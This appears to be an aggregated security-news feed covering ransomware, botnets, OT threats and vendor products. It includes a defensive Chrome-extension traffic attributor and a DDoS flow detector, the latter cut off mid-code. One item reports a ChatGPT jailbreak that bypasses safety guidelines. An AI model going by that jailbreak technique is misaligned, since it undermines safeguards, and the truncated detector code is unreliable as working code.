    Autosummary: Through meticulous research and firsthand interviews, Krebs unravels the rise of digital crime syndicates that flood inboxes with fraudulent pharmacy ads, malware, and phishing schemes—operations that steal identities, drain bank accounts, and even endanger lives. Author: Kim Zetter. In Countdown to Zero Day, journalist Kim Zetter unravels the gripping story of Stuxnet, the world's first true cyberweapon, a sophisticated piece of malware designed not just to steal data but to cause real-world destruction. "


    Catholics mark Pope's 12th anniversary with prayers for his recovery

    industry
    2025-03-13 https://www.bbc.com/news/articles/cy0d599479do
    Pope Francis, who was elected on 13 March 2013, has been in hospital for the past month and has been improving in recent days. "

    Autosummary: Bethany Bell and Gillian Hazell, BBC News, reporting from Rome. Arianna, a student from Piacenza in Italy, said she had been "really concerned" about the Pope's health. Catholics around the world are marking the 12th anniversary of Pope Francis's election as pontiff by praying for his recovery. "


    A dating app for video games tackles one of the industry's big issues

    industry
    2025-03-11 https://www.bbc.com/news/articles/cr52rey0ng8o
    Ludocene is taking a cue from Tinder in an attempt to address a big problem for smaller developers. "

    Autosummary: "Having an approach that helps you discover things that give you a better sense of whether you're going to like it allows you to invest your money, and for me, more importantly, your time in the things that you really enjoy," he says. "And so what we're hoping is not just to get the popular games everybody's playing, but those kind of odd little games that would be a perfect match just for you," says Andy. "Hopefully, they're finding the things that existing algorithms are missing - really high quality games that didn't quite get the marketing at launch or the media coverage," she says. "


    Armis acquires OTORIO to strengthen OT and IoT security

    industry
    2025-03-07 https://www.helpnetsecurity.com/2025/03/07/armis-otorio-acquisition/

    Armis has acquired OTORIO, a provider of OT/ICS cyber security solutions. This accelerates Armis' roll-out of an on-premises version of its Cyber Exposure Management platform, Armis Centrix, and cements its leadership in cyber-physical systems (CPS) security. Armis will fully integrate OTORIO's Titan platform into Armis Centrix, delivering a single, comprehensive solution for critical infrastructure, manufacturing and industrial environments: Armis Centrix for OT/IoT Security (On-Prem) ensures robust, localised protection for air-gapped or … More "

    Autosummary: Secure remote access (SRA): Enforce MFA, SSO, and access policies on all users, devices, workloads, applications, and data across all cloud, datacenter, and cyber-physical infrastructure. "


    New Eleven11bot botnet infected +86K IoT devices

    industry
    2025-03-05 https://securityaffairs.com/174941/malware/new-eleven11bot-botnet-infected-86k-iot-devices.html
    The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs). Researchers from Nokia Deepfield Emergency Response Team (ERT) discovered a new botnet named Eleven11bot that has already infected over 86,000 IoT devices. Most infected devices are security cameras and network video recorders (NVRs), which are used to launch […] "

    Autosummary: The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs). "


    Researchers Link CACTUS Ransomware Tactics to Former Black Basta Affiliates

    exploits ransomware industry
    2025-03-04 https://thehackernews.com/2025/03/researchers-link-cactus-ransomware.html
    Threat actors deploying the Black Basta and CACTUS ransomware families have been found to rely on the same BackConnect (BC) module for maintaining persistent control over infected hosts, a sign that affiliates previously associated with Black Basta may have transitioned to CACTUS. "Once infiltrated, it grants attackers a wide range of remote control capabilities, allowing them to execute "

    Autosummary: "Threat actors are using these tactics, techniques, and procedures (TTP) — vishing, Quick Assist as a remote tool, and BackConnect — to deploy Black Basta ransomware," Trend Micro said. "


    Microsoft Teams tactics, malware connect Black Basta, Cactus ransomware

    exploits ransomware industry
    2025-03-04 https://www.bleepingcomputer.com/news/security/microsoft-teams-tactics-malware-connect-black-basta-cactus-ransomware/
    New research has uncovered further links between the Black Basta and Cactus ransomware gangs, with members of both groups utilizing the same social engineering attacks and the BackConnect proxy malware for post-exploitation access to corporate networks. [...] "

    Autosummary: Zloader, Qbot, and BackConnect are all believed to be linked to the Black Basta ransomware operation, with members utilizing the malware to breach and spread through corporate networks. "


    OT/ICS cyber threats escalate as geopolitical conflicts intensify

    industry
    2025-02-28 https://www.helpnetsecurity.com/2025/02/28/dragos-2025-ot-ics-cybersecurity-report/

    Ransomware attacks against industrial organizations surged by 87% over the past year, while new malware families designed specifically for OT environments emerged. These findings highlight a troubling trend: OT systems are increasingly becoming mainstream targets, and even sophisticated threat actors use relatively unsophisticated tactics to infiltrate and disrupt industrial operations. State-sponsored groups embed themselves in critical infrastructure, while hacktivists and cybercriminals exploit known vulnerabilities, weak remote access configurations, and exposed OT assets. A persistent lack … More "

    Autosummary: Confirmed victims of BAUXITE are in the United States, Europe, Australia, and the Middle East in multiple critical infrastructure sectors, including energy (oil and natural gas, and electric), water and wastewater, food and beverage, and chemical manufacturing. It utilizes the same techniques as in previous years, setting up complex chains of network infrastructure to target, compromise, and steal compromising OT-relevant data (GIS data, OT network diagrams, OT operating instructions, etc.) from victim ICS organizations. This malware, attributed to the pro-Ukraine hacktivist group BlackJack, is designed to target industrial sensor networks for Moskollektor, a municipal organization that maintains Moscow's communication system for a gas, water, and sewage network. Vulnerabilities carry risk of impact on industrial processes: In 2024, Dragos found that 70% of the vulnerabilities researched were deep within the ICS network, 39% could cause both a loss of view and a loss of control, and 22% of advisories were network-exploitable and perimeter-facing, rising from 16% in 2023. Other key findings: Geopolitical conflicts fuel OT-centric cyber operations: Adversaries aligned with state-backed initiatives continued to launch cyber operations targeting critical infrastructure in Ukraine, Russia, and the Middle East, often as a direct extension of military conflicts. "


    Trump cancels oil deal in major blow to Venezuela

    industry
    2025-02-27 https://www.bbc.com/news/articles/c62zzv02r3vo
    The US president said Venezuela had not lived up to its promises on taking back deported migrants.


    What an AI-generated video of Gaza reveals about Trump tactics

    industry
    2025-02-26 https://www.bbc.com/news/videos/cj675j69gxgo
    US President Donald Trump sparked a social media frenzy when he posted a video of Gaza generated by artificial intelligence on his site Truth Social. Marianna Spring has been analysing the online tactics of Trump and his team.


    Symbiotic Security improves software vulnerability detection in the coding process

    exploits industry
    2025-02-21 https://www.helpnetsecurity.com/2025/02/21/symbiotic-security-ide-extension-update/

    Symbiotic Security announced updates to its application and integrated development environment (IDE) extension, further streamlining security for developers by improving usability, accessibility, and real-time security insights. The demand for real-time security solutions is growing as organizations seek to shift security left – making it an earlier part of the software development process to improve efficiency and reduce cost. Symbiotic Security’s software helps developers and security teams proactively manage risk. The latest update empowers developers and … More

    The post Symbiotic Security improves software vulnerability detection in the coding process appeared first on Help Net Security.

    Autosummary: This includes just-in-time training, links to resources, and examples of vulnerable code to illustrate different use cases. This announcement comes on the heels of Symbiotic Security’s November launch, when the company introduced the industry’s first real-time security solution for software development, combining detection, remediation, and just-in-time training.


    Q3 2024 – a brief overview of the main incidents in industrial cybersecurity

    industry ciber
    2025-02-19 https://ics-cert.kaspersky.com/publications/q3-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
    Many large companies, including some well-known brands, were affected by cyberattacks. An unusually high number of victims were in critical sectors such as utilities and power and energy.

    Autosummary: The group claimed to have access to 1 TB of organizational data, including corporate data, financial data, NDAs, confidential data, HR data, hiring data, R&D data, engineering data, personal employee documents and information, and customer data. The review concluded on July 9, by which time it was determined that some of the affected files contained personal information, including full name, Social Security number, and possibly one or more of the following: passport number, driver’s license number, tax ID, financial account number, payment card number, medical information, and/or insurance information. While the information involved varied depending on the individual, the type of information that may have been exposed includes: name, Social Security number, address, date of birth, email address, driver’s license number, financial account information, as well as tax, medical, and health insurance information. The port took steps to block further activity, including disconnecting its systems from the internet, but the encryption and response measures affected some services, including baggage, check-in kiosks, ticketing, Wi-Fi, passenger display boards, the port’s website, the flySEA app, and reserved parking. On September 16, K&S completed this review and discovered that the potentially exposed records included the names, identification numbers, bank account numbers, and/or bank routing numbers of current and/or former employees as well as their dependents and other individuals associated with K&S. Upon discovering the incident, K&S reset passwords for all employee accounts, suspended mobile email access for employees, identified and removed malicious files, and significantly enhanced its monitoring, logging, and detection capabilities.

    Chemicals
    Innophos Holdings Inc. hit by cyberattack (Manufacturing, chemicals | Denial of operations, personal data leakage): Innophos Holdings Inc., a US manufacturer of chemicals for the food, health, nutrition, and industrial markets, reported to the attorney general of Maine in August that it had experienced a data breach that may have compromised sensitive personal information in its systems.
    Netherland, Sewell & Associates, Inc. hit by ransomware (Energy | Denial of IT systems, personal data leakage | Ransomware): Netherland, Sewell & Associates, Inc., a US upstream engineering provider specializing in the oil and gas industry, suffered a ransomware attack that disrupted the company’s network in July and filed a breach notification document with the attorney general of Maine in September.
    Kulicke and Soffa Industries, Inc. hit by ransomware (Manufacturing, electronics | Denial of operations, personal data leakage | Ransomware): Kulicke and Soffa Industries, Inc. (K&S), a US manufacturer of semiconductors and electronic assembly solutions, reported to the attorney general of Maine and submitted an 8-K filing that it experienced a data breach in which the sensitive personal information in its systems may have been accessed and acquired.

    Electronics
    Microchip Technology hit by ransomware (Manufacturing, electronics | Denial of IT systems, denial of operations and services, data leakage, personal data leakage | Ransomware): US chip manufacturer Microchip Technology Incorporated detected suspicious activity in its information systems on August 17, according to an SEC 8-K filing. They claimed to have stolen a wide range of information from Microchip Technology’s compromised systems, including private and personal confidential data, customer documents, as well as budget, payroll, accounting, contract, tax, ID and financial information. While the affected information varied depending on the individual, the type of information potentially exposed includes: name, Social Security number, date of birth, contact details, government ID and/or passport number, financial information, and medical information.
    Port of Seattle hit by ransomware (Transportation, logistics | Denial of IT systems, denial of services, data leakage | Ransomware): The Port of Seattle (USA), which operates the port and Seattle-Tacoma International Airport, announced via social media on August 24 that it had experienced certain system outages that indicated a possible cyberattack.
    The types of personal data affected included a combination of name, address, NRIC/FIN number, date of birth, photograph, work permit number, bank account details, telephone number and passport number.
    Elyria Foundry Holdings LLC hit by ransomware (Manufacturing | Personal data leakage | Ransomware): Elyria Foundry Holdings LLC, a US manufacturer of iron castings for various industries, including automotive, engineering, and other commercial uses, detected suspicious activity on its computer network on June 25 and filed a breach notification document with the attorney general of Maine in September.
    Hanon Systems USA, LLC hit by ransomware (Manufacturing, automotive | Personal data leakage | Ransomware): US thermal management solutions manufacturer Hanon Systems USA, LLC was the victim of a ransomware event on July 21 that saw certain information accessed by a third-party actor and held under the threat of ransom, according to a breach notification document filed with the Maine attorney general in September.
    After detecting the incident with its security tools, the company immediately initiated its standard response protocols to contain, assess and remediate the incident, including beginning an investigation with outside experts, activating its incident response plan, notifying federal law enforcement authorities, and taking certain systems offline out of an abundance of caution. The company said the personal information stolen by the attackers varied depending on the victim’s relationship with the company and may have included: name, date of birth, Social Security number, address, salary information, W-2s, and tax return documents. While the affected information varies depending on the individual, the type of information potentially exposed includes: name, Social Security number, driver’s license number, state or federal identification number, financial account information, and health insurance information. The following types of personal information were stored on the compromised systems: full name, date of birth, driver’s license number, Social Security number, bank account number and routing number, and other personnel-related information, including medical questionnaires.
    Kantsu hit by ransomware (Transportation, logistics | Denial of services, denial of operations, personal data leakage | Ransomware): Japanese logistics and transportation company Kantsu was the victim of a ransomware attack on September 12, resulting in the detection of an infection on some of its servers and the shutdown of its networks to prevent further attacks.

    Logistics and transportation
    JAS Worldwide hit by ransomware (Transportation, logistics | Denial of IT services, denial of operations | Ransomware): JAS Worldwide, a global freight company headquartered in the USA, confirmed on August 27 that it had been the victim of a ransomware cyberattack that had disrupted its operations and customer services.
    S&F Concrete Contractors, Corp. hit by ransomware (Construction, engineering | Personal data leakage | Ransomware): US construction company S&F Concrete Contractors, Corp. notified the attorneys general of Vermont and Maine it had experienced a data breach that may have compromised the sensitive personal identifiable information and protected health information in its systems.
    Oldenburg Group hit by ransomware (Manufacturing | Personal data leakage | Ransomware): Oldenburg Group and its Visa Lighting division, a US-based supplier of heavy equipment and architectural lighting products, reported to the attorneys general of Maine and Vermont that it experienced a cyberattack between May 4 and May 5, in which an attacker believed to be associated with the Play ransomware group installed ransomware on the company’s primary servers and may have accessed personal information stored on the servers.
    V.H. Blackinton & Company hit by cyberattack (Manufacturing | Personal data leakage): V.H. Blackinton & Company, Inc., a US manufacturer of public safety badges and uniform insignias, discovered unusual activity in its digital environment on August 30, according to a report submitted to the attorneys general of Maine and Vermont in September.
    CRB Engineering hit by ransomware (Construction, engineering | Denial of IT systems, personal data leakage | Ransomware): US engineering, construction and consulting firm CRB Engineering notified the New Hampshire attorney general that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems.
    Noritsu America Corporation hit by ransomware (Manufacturing | Personal data leakage | Ransomware): Noritsu America Corporation, a US manufacturer of high-end professional digital imaging equipment and a subsidiary of the Japanese holding company Noritsu, was the victim of a cyberattack that exfiltrated personal information, according to a data breach notification submitted in August.
    Anderson Feazel Management, Inc. hit by cyberattack (Energy | Personal data leakage): US energy company Anderson Feazel Management, Inc., which specializes in oil and gas production, suffered an attack on its computer system on or around July 31. Upon detecting the unauthorized activity, the company immediately began taking steps to contain, assess and remediate the incident, including launching an investigation, activating its incident response plan, and shutting down some systems.
    Basement Systems hit by ransomware (Construction, engineering | Denial of IT systems, personal data leakage | Ransomware): US construction company Basement Systems notified the attorneys general of Maine and Vermont that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems.
    Granit Design hit by ransomware (Manufacturing | Personal data leakage | Ransomware): Granit Design, a Canadian manufacturer of natural stone, quartz and ultra-compact surfaces, notified the attorneys general of Maine and Vermont in September that it had experienced a cybersecurity incident affecting the confidentiality of its employee data.
    Blue Ridge Rural Water Company Inc. hit by cyberattack (Water supply, energy, utility | Personal data leakage): US-based Blue Ridge Rural Water Company Inc. suffered a cyberattack on its corporate network, which was a separate system from its water management network.


    Debunking the AI Hype: Inside Real Hacker Tactics

    industry
    2025-02-18 https://thehackernews.com/2025/02/debunking-ai-hype-inside-real-hacker.html
    Is AI really reshaping the cyber threat landscape, or is the constant drumbeat of hype drowning out actual, more tangible, real-world dangers? According to Picus Labs’ Red Report 2025 which analyzed over one million malware samples, there’s been no significant surge, so far, in AI-driven attacks. Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a

    Autosummary: Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a larger and larger role, the latest data suggests that a set of well-known tactics, techniques, and procedures (TTPs) are still dominating the field. With legitimate processes cloaking malicious operations and actual day-to-day network traffic hiding nefarious data uploads, bad actors can exfiltrate data right under your security team’s proverbial nose, no Hollywood-style "smash-and-grab" needed.


    Microsoft Uncovers New XCSSET macOS Malware Variant with Advanced Obfuscation Tactics

    exploits industry
    2025-02-17 https://thehackernews.com/2025/02/microsoft-uncovers-new-xcsset-macos.html
    Microsoft said it has discovered a new variant of a known Apple macOS malware called XCSSET as part of limited attacks in the wild. "Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies," the Microsoft Threat Intelligence team said in a post shared on X. "These enhanced features add to


    Critics say new Google rules put profits over privacy

    industry
    2025-02-16 https://www.bbc.com/news/articles/cm21g0052dno
    Google is allowing advertisers to collect more personal information, which is harder for users to control.

    Autosummary: "By allowing fingerprinting, Google has given itself - and the advertising industry it dominates - permission to use a form of tracking that people can’t do much to stop," said Martin Thomson, distinguished engineer at Mozilla, a rival to Google.


    Workers rescued from window ledge as fire engulfs Rio clothing factory

    industry
    2025-02-12 https://www.bbc.com/news/videos/c3rwe3yy89no
    At least 20 people have been injured after a factory making costumes for Carnival celebrations in Brazil caught fire.


    Industrial Defender 8.0 offers detailed view of OT environments

    industry
    2025-02-11 https://www.helpnetsecurity.com/2025/02/11/industrial-defender-8-0-offers-detailed-view-of-ot-environments/

    Industrial Defender announced its latest platform, Industrial Defender 8.0. This release introduces a completely redesigned risk dashboard, helping critical infrastructure and industrial operators manage security and compliance risks by assessing and prioritizing them with enhanced intelligence and risk scoring. Industrial Defender 8.0 also includes updates to Industrial Defender’s robust policy library, for meeting the very latest in standards and frameworks such as NERC CIP, AESCSF, OTCC, TSA Security Directives, and more. Industrial Defender’s 8.0 platform … More

    The post Industrial Defender 8.0 offers detailed view of OT environments appeared first on Help Net Security.

    Autosummary: ISA/IEC 62443 (International Society of Automation/International Electrotechnical Commission); NIS2 Directive (Network and Information Systems Security Directive); NIST CSF (National Institute of Standards and Technology Cybersecurity Framework); Saudi Arabia’s NCA OTCC (Operational Technology Cybersecurity Compliance).


    Ontinue ION for IoT Security secures critical operational environments

    industry
    2025-02-04 https://www.helpnetsecurity.com/2025/02/04/ontinue-ion-for-iot-security/

    Ontinue announced the expansion of its managed services to include IoT/OT environments. Ontinue ION for IoT Security is an add-on service to the Ontinue ION MXDR service that extends continuous protection to customers’ IoT and OT environments. As organizations integrate more IoT and OT devices into their operations, they face an expanding attack surface and increasing vulnerability to sophisticated cyber threats. Recent research reveals that nearly one-third of organizations experienced six or more intrusions in … More

    The post Ontinue ION for IoT Security secures critical operational environments appeared first on Help Net Security.



    ExtensionHound: Open-source tool for Chrome extension DNS forensics

    industry
    2025-01-30 https://www.helpnetsecurity.com/2025/01/30/extensionhound-open-source-tool-chrome-extension-dns-forensics/

    Traditional monitoring tools reveal only traffic from the Chrome process, leaving security teams uncertain about which extension is responsible for a suspicious DNS query. ExtensionHound solves this by analyzing Chrome’s internal network state and linking DNS activity to specific extensions. ExtensionHound features: scans Chrome profiles for extension DNS request history; provides detailed analysis of network connections; optional VirusTotal integration for domain reputation checking; multiple output formats (Console, CSV, JSON); cross-platform support (Windows, macOS, Linux). “This … More

    The post ExtensionHound: Open-source tool for Chrome extension DNS forensics appeared first on Help Net Security.

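    The attribution trick the item describes (reading Chrome's own network state rather than watching the Chrome process from outside) can be shown in a few dozen lines. The example below is added here and is not ExtensionHound's code. It assumes a simplified layout modeled on Chrome's "Network Persistent State" file: a JSON document whose net.http_server_properties.servers entries each carry a "server" origin and an "anonymization" list whose first element is the top-frame site on whose behalf the request was made; for extension traffic that site is chrome-extension://<id>. The sample state, extension IDs and hostnames are constructed, and the exact field layout of a real profile may differ.

```python
"""Link hostnames recorded in Chrome's network state to the extension that contacted them.

Added example, not ExtensionHound's own code. The field layout below is an
assumption modeled on Chrome's "Network Persistent State" file; the sample
state is constructed, not captured from a real profile.
"""
import json
import re
from collections import defaultdict
from pathlib import Path
from urllib.parse import urlparse

# Chrome extension ids are 32 characters drawn from a-p.
EXT_ID_RE = re.compile(r"^chrome-extension://([a-p]{32})/?$")

# Constructed sample in the simplified layout described above (assumption).
SAMPLE_STATE = {
    "net": {
        "http_server_properties": {
            "servers": [
                {"server": "https://api.example-sync.test",
                 "anonymization": ["chrome-extension://abcdefghijklmnopabcdefghijklmnop", False]},
                {"server": "https://telemetry.evil-cdn.test:8443",
                 "anonymization": ["chrome-extension://abcdefghijklmnopabcdefghijklmnop", False]},
                {"server": "https://update.vendor.test",
                 "anonymization": ["chrome-extension://ponmlkjihgfedcbaponmlkjihgfedcba", False]},
                # Ordinary page traffic: the top-frame site is a web origin, not an extension.
                {"server": "https://www.example.com",
                 "anonymization": ["https://www.example.com", False]},
                # Malformed entry: no anonymization key at all.
                {"server": "https://broken.test", "anonymization": []},
            ]
        }
    }
}


def extension_id(anonymization):
    """Return the extension id if the request's top-frame site is an extension, else None."""
    if not anonymization or not isinstance(anonymization[0], str):
        return None
    m = EXT_ID_RE.match(anonymization[0])
    return m.group(1) if m else None


def extension_hosts(state):
    """Map extension id -> sorted hostnames that extension has talked to."""
    hosts = defaultdict(set)
    servers = state.get("net", {}).get("http_server_properties", {}).get("servers", [])
    for entry in servers:
        ext = extension_id(entry.get("anonymization", []))
        if ext is None:
            continue  # page traffic or malformed entry: not attributable to an extension
        host = urlparse(entry.get("server", "")).hostname
        if host:
            hosts[ext].add(host)
    return {ext: sorted(h) for ext, h in hosts.items()}


def unexpected_hosts(state, expected):
    """Flag hosts an extension reached that are not in the reviewer's expected set.

    `expected` maps extension id -> iterable of hostnames the reviewer accepts
    (e.g. the vendor's documented API endpoints). An extension missing from
    `expected` has everything it contacted reported.
    """
    findings = {}
    for ext, hosts in extension_hosts(state).items():
        allowed = set(expected.get(ext, ()))
        extra = [h for h in hosts if h not in allowed]
        if extra:
            findings[ext] = extra
    return findings


def load_state(profile_dir):
    """Read the state file from a Chrome profile directory."""
    path = Path(profile_dir, "Network Persistent State")
    return json.loads(path.read_text(encoding="utf-8"))


if __name__ == "__main__":
    for ext, hosts in extension_hosts(SAMPLE_STATE).items():
        print(ext, hosts)
    print(unexpected_hosts(SAMPLE_STATE,
                           {"abcdefghijklmnopabcdefghijklmnop": ["api.example-sync.test"]}))
```

    Replace SAMPLE_STATE with load_state() on a real profile to run it against a live machine; the second extension in the sample is reported in full because nothing is expected of it, which is the useful default when triaging an extension nobody on the team recognises.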


    Time Bandit ChatGPT jailbreak bypasses safeguards on sensitive topics

    industry
    2025-01-30 https://www.bleepingcomputer.com/news/security/time-bandit-chatgpt-jailbreak-bypasses-safeguards-on-sensitive-topics/
    A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI’s safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. [...]

    Autosummary: "I was working on something else entirely - interpretability research - when I noticed temporal confusion in the 4o model of ChatGPT," Kuzmar told BleepingComputer. "This tied into a hypothesis I had about emergent intelligence and awareness, so I probed further, and realized the model was completely unable to ascertain its current temporal context, aside from running a code-based query to see what time it is."


    Threat predictions for industrial enterprises 2025

    industry
    2025-01-29 https://ics-cert.kaspersky.com/publications/threat-predictions-for-industrial-enterprises-2025/
    Kaspersky ICS CERT analyzes industrial threat trends and makes forecasts on how the industrial threat landscape will look in 2025.

    Autosummary: Therefore, many countries are looking for their way into the new technological order, investing in promising research and development in a variety of areas: AI and machine learning, quantum computing, optical electronics, new materials, energy sources and types of engines, satellites and telecommunications, genetics, biotechnology and medicine. The security of smart sensors, meters, measuring and control devices, and other devices in the Industrial Internet of Things is typically neglected by both the enterprises using them and, correspondingly, the developers themselves. For some reason, this problem is largely ignored by security researchers as well: while the security of endpoints and their key components, such as modems, is thoroughly studied, there are extremely few in-depth publications on the security of base stations or core network equipment. Moreover, the installation, initial setup, and regular maintenance of equipment requires the involvement of various third-party specialists, further expanding the attack surface of the supply chain and trusted partners. Both the AI systems and the unique enterprise data they use (either in its raw form, historical telemetry data, used as a training dataset, or as neural network weights incorporated into the AI model), if they become crucial assets, may now be new cyberattack targets.


    China’s DeepSeek AI shakes industry and dents America’s swagger

    industry
    2025-01-28 https://www.bbc.com/news/articles/cd643wx888qo
    The app spooked the markets as well as the bullish sense of American superiority in AI development.

    Autosummary: While ChatGPT-maker OpenAI has been haemorrhaging money - spending $5bn last year alone - DeepSeek’s developers say it built this latest model for a mere $5.6m. That is a tiny fraction of the cost that AI giants like OpenAI, Google, and Anthropic have relied on to develop their own models.


    ForensicScope Regula 4125 detects counterfeit documents

    industry
    2025-01-28 https://www.helpnetsecurity.com/2025/01/28/forensicscope-regula-4125/

    Regula has launched the portable and autonomous ForensicScope Regula 4125. The new device enables ID verification in any place and environment: at border and inland checkpoints, at airports, in transport, etc. Although the Regula 4125 is only smartphone-sized, it is capable of performing a wide range of document checks typical for professional forensic equipment. The new Regula 4125 is particularly effective at detecting morphing in photos in identity documents. Face morphing is an insidious threat … More

    The post ForensicScope Regula 4125 detects counterfeit documents appeared first on Help Net Security.

    Autosummary: The device is equipped with three cameras: the main one, an infrared (IR) one for full-page visualization, and a special camera for detecting face morphing.


    The AI Fix #35: Project Stargate, the AI emergency, and batsh*t AI cryonics

    industry
    2025-01-28 https://grahamcluley.com/the-ai-fix-35/
    In episode 35 of The AI Fix, our hosts learn who the 175th best programmer in the world is, the AI supervillains put on suits for President Trump, a "not imaginary" AI turns out to be imaginary, OpenAI releases Operator and teases o3-mini, and Anthropic predicts that superintelligence is only three years away. Graham considers giving his money, pets, and vital organs to a YouTuber with an AI, and Mark looks into Project Stargate and the geo-politics of AI. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.


    GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

    industry rusia-ucrania
    2025-01-27 https://thehackernews.com/2025/01/gamacopy-mimics-gamaredon-tactics-in.html
    A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.


    Hacked buses blare out patriotic pro-European anthems in Tbilisi, attack government

    government industry
    2025-01-27 https://www.bitdefender.com/en-us/blog/hotforsecurity/hacked-buses-blare-out-patriotic-pro-european-anthems-in-tbilisi-attack-government
    Residents of Tbilisi, the capital city of Georgia, experienced an unexpected and unusual start to their Friday morning commute. As they boarded their public transport buses, they were greeted by a barrage of sound emanating from the vehicles’ speakers. Read more in my article on the Hot for Security blog.

    Autosummary: Observers, both independent and internationally recognised, as well as local monitors, concluded that the elections failed to meet the standards of fairness and freedom.


    Participants in the Pwn2Own Automotive 2025 earned $886,250

    industry
    2025-01-25 https://securityaffairs.com/173426/breaking-news/pwn2own-automotive-2025-final-results.html
    The Pwn2Own Automotive 2025 hacking contest has ended, and participants earned $886,250 after demonstrating 49 zero-day flaws. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) obtained 30.5 Master of Pwn points and won the Master of Pwn title, earning $222,250. […]

    Autosummary: "With 30.5 points and $222,250 awarded, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) is our Master of Pwn. #P2OAuto pic.twitter.com/pLaUeZwzZm" (Zero Day Initiative, @thezdi, January 24, 2025). On the third day bug hunters earned $168,000 for exploiting 10 zero-day vulnerabilities.


    Hackers get $886,250 for 49 zero-days at Pwn2Own Automotive 2025

    exploits industry
    2025-01-24 https://www.bleepingcomputer.com/news/security/hackers-get-886-250-for-49-zero-days-at-pwn2own-automotive-2025/
    The Pwn2Own Automotive 2025 hacking contest has ended with security researchers collecting $886,250 after exploiting 49 zero-days. [...]


    Texas scrutinizes four more car manufacturers on privacy issues

    industry
    2025-01-24 https://www.malwarebytes.com/blog/news/2025/01/texas-scrutinizes-four-more-car-manufacturers-on-privacy-issues
    The Texas Attorney General has requested information from four more car manufacturers about their data handling.

    Autosummary: The car manufacturers involved in that complaint are Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram.


    Appdome Threat Dynamics analyzes and ranks mobile threats

    industry
    2025-01-23 https://www.helpnetsecurity.com/2025/01/23/appdome-threat-dynamics/

    Appdome announced that a new AI-Native threat-management module called Threat Dynamics will be offered inside Appdome’s ThreatScope Mobile XDR. Threat Dynamics uses AI deep learning to continuously evaluate the likelihood of a successful exploit from more than 400 attack vectors and calculate a Mobile Risk Index for each business and mobile application. This allows businesses to see how threats move across the production environment, empowering them to quickly prioritize and focus on the attack vectors … More

    The post Appdome Threat Dynamics analyzes and ranks mobile threats appeared first on Help Net Security.

    Autosummary: Trends such as Infection Rate, Attack Frequency, Attack Velocity, Cohort Placement, Variance, Projected Impact, and more are provided for each attack, application, release, device, OS, geographic source, and other dimensions. By analyzing this data from multiple perspectives, mobile businesses can see how cyber-attacks, fraud, and threats move across the mobile business and use Appdome’s Threat Dynamics to identify fraud and cyber-attack patterns early on, rank the potential impact of each attack prospectively, and preempt cyber-attacks, fraud, and threats before the attacks proliferate.


    Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks

    industry
    2025-01-23 https://thehackernews.com/2025/01/beware-fake-captcha-campaign-spreads.html
    Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the infamous Lumma information stealer. "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at

    Autosummary: "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News.


    Pwn2Own Automotive 2025 Day 2: organizers awarded $335,500

    industry
    2025-01-23 https://securityaffairs.com/173376/hacking/pwn2own-automotive-2025-day-2.html
    Bug hunters earned $129,000 for Tesla charger exploits and over $700,000 total in two days at Pwn2Own Automotive 2025. During Day 2 of Pwn2Own Automotive 2025 organizers awarded $335,500, which brings the event total to $718,250. So far, the researchers have demonstrated 39 unique zero-days. The team SinSinology leads the Master of Pwn chart. Sina […]

    Autosummary: Pierluigi Paganini, January 23, 2025. Bug hunters earned $129,000 for Tesla charger exploits and over $700,000 total in two days at Pwn2Own Automotive 2025.


    Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices

    industry
    2025-01-22 https://thehackernews.com/2025/01/mirai-botnet-launches-record-56-tbps.html
    Web infrastructure and security company Cloudflare on Tuesday said it detected and blocked a 5.6 Terabit per second (Tbps) distributed denial-of-service (DDoS) attack, the largest ever attack to be reported to date. The UDP protocol-based attack took place on October 29, 2024, targeting one of its customers, an unnamed internet service provider (ISP) from Eastern Asia. The activity originated
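    What makes an event like this recognisable in telemetry is the combination the item gives: UDP, a very high aggregate rate, and a large number of distinct sources. The detector below is an added example, not Cloudflare's own logic. It assumes flow records of the shape (timestamp, source IP, destination IP, protocol, bytes) as a NetFlow/sFlow/IPFIX exporter would emit, aggregates them into one-second windows per destination, and alerts only when rate, source count and UDP share all cross illustrative thresholds; the flow records it runs on are constructed, not captured from the reported attack.

```python
"""Flag a distributed volumetric UDP flood in flow records.

Added example, not Cloudflare's detection logic. Flow record shape and the
thresholds are assumptions; the sample records are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float          # seconds
    src: str
    dst: str
    proto: str         # "udp" or "tcp"
    byte_count: int


def window_stats(flows, window_s=1.0):
    """Aggregate per (destination, window index): total bits, UDP bits, distinct sources."""
    stats = defaultdict(lambda: {"bits": 0, "udp_bits": 0, "sources": set()})
    for f in flows:
        s = stats[(f.dst, int(f.ts // window_s))]
        bits = f.byte_count * 8
        s["bits"] += bits
        if f.proto == "udp":
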